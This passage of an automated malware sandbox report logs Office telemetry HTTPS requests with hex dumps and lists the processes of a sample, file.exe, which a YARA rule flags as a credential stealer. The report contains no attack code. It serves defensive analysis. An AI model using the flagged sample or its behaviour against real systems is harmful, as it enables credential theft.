                                                                                                                                                                      2024-11-21 05:24:16 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      143192.168.2.64991313.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:24:16 UTC192OUTGET /rules/rule702500v1s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:24:16 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:24:16 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 1378
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                                                                                                                                                      ETag: "0x8DC582BDB813B3F"
                                                                                                                                                                      x-ms-request-id: de9d050e-401e-0078-2067-3b4d34000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052416Z-178bfbc474bv587zhC1NYCny5w00000000tg00000000rb47
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:24:16 UTC1378INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammability" S="Medium" />


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      144192.168.2.64991513.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:24:16 UTC192OUTGET /rules/rule700500v1s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:24:16 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:24:16 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 1368
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                                                                      ETag: "0x8DC582BE51CE7B3"
                                                                                                                                                                      x-ms-request-id: c70c13b9-401e-0064-2959-3b54af000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052416Z-178bfbc474bh5zbqhC1NYCkdug000000011g00000000104e
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:24:16 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 6f 77 65 72 50 6f 69 6e 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPowerPoint" S="Medium" /> <F T=


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      145192.168.2.64991613.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:24:18 UTC192OUTGET /rules/rule702551v1s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:24:18 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:24:18 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 1415
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                                                                                                                                                      ETag: "0x8DC582BDCE9703A"
                                                                                                                                                                      x-ms-request-id: a16a2ddb-901e-0064-058c-3ae8a6000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052418Z-178bfbc474bv7whqhC1NYC1fg40000000130000000003a14
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:24:18 UTC1415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702551" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      146192.168.2.64991713.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:24:18 UTC192OUTGET /rules/rule702550v1s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:24:19 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:24:18 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 1378
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                                                                      ETag: "0x8DC582BE584C214"
                                                                                                                                                                      x-ms-request-id: 36815d12-601e-0070-4763-3ba0c9000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052418Z-178bfbc474bpnd5vhC1NYC4vr400000000yg00000000n07w
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:24:19 UTC1378INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702550" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPersonalization" S="Medium" />


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      147192.168.2.64991813.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:24:18 UTC192OUTGET /rules/rule701351v1s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:24:19 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:24:18 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 1407
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                                                                                                                                                      ETag: "0x8DC582BE687B46A"
                                                                                                                                                                      x-ms-request-id: 9dcf90b9-e01e-000c-7364-3b8e36000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052418Z-178bfbc474bbbqrhhC1NYCvw74000000015000000000dbx7
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:24:19 UTC1407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTok


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      148192.168.2.64991913.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:24:18 UTC192OUTGET /rules/rule701350v1s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:24:19 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:24:18 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 1370
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                                                                                                                      ETag: "0x8DC582BDE62E0AB"
                                                                                                                                                                      x-ms-request-id: 24867866-a01e-0053-1264-3b8603000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052418Z-178bfbc474bp8mkvhC1NYCzqnn00000000tg00000000np45
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:24:19 UTC1370INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 66 6f 72 6d 61 6e 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPerformance" S="Medium" /> <F


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                      149192.168.2.64992013.107.246.45443
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-11-21 05:24:18 UTC192OUTGET /rules/rule702151v1s19.xml HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                      2024-11-21 05:24:19 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Thu, 21 Nov 2024 05:24:18 GMT
                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                      Content-Length: 1397
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                      ETag: "0x8DC582BE156D2EE"
                                                                                                                                                                      x-ms-request-id: 8149a5d6-a01e-001e-117b-3b49ef000000
                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                      x-azure-ref: 20241121T052418Z-r1d97b995774n5h6hC1TEBvf8400000009tg00000000k7vz
                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                      2024-11-21 05:24:19 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 6f 70 6c 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 6f
                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.People.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPeo


                                                                                                                                                                      Click to jump to process

                                                                                                                                                                      Click to jump to process

                                                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                                                      Click to jump to process

                                                                                                                                                                      Target ID:0
                                                                                                                                                                      Start time:00:23:10
                                                                                                                                                                      Start date:21/11/2024
                                                                                                                                                                      Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                                                                      Imagebase:0xb00000
                                                                                                                                                                      File size:1'901'056 bytes
                                                                                                                                                                      MD5 hash:4658DFD86A5C61DF7F4DC30347017718
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2317895828.0000000001283000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      Reputation:low
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:5
                                                                                                                                                                      Start time:00:23:45
                                                                                                                                                                      Start date:21/11/2024
                                                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                      Imagebase:0x7ff684c40000
                                                                                                                                                                      File size:3'242'272 bytes
                                                                                                                                                                      MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high
                                                                                                                                                                      Has exited:false

                                                                                                                                                                      Target ID:7
                                                                                                                                                                      Start time:00:23:46
                                                                                                                                                                      Start date:21/11/2024
                                                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=2020,i,15066191310889965493,6734500670123493678,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                      Imagebase:0x7ff684c40000
                                                                                                                                                                      File size:3'242'272 bytes
                                                                                                                                                                      MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high
                                                                                                                                                                      Has exited:false

                                                                                                                                                                      Target ID:8
                                                                                                                                                                      Start time:00:23:48
                                                                                                                                                                      Start date:21/11/2024
                                                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                      Imagebase:0x7ff684c40000
                                                                                                                                                                      File size:3'242'272 bytes
                                                                                                                                                                      MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Target ID:9
                                                                                                                                                                      Start time:00:23:49
                                                                                                                                                                      Start date:21/11/2024
                                                                                                                                                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=2008,i,11137698376762486323,5584479856548226272,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                      Imagebase:0x7ff684c40000
                                                                                                                                                                      File size:3'242'272 bytes
                                                                                                                                                                      MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      No disassembly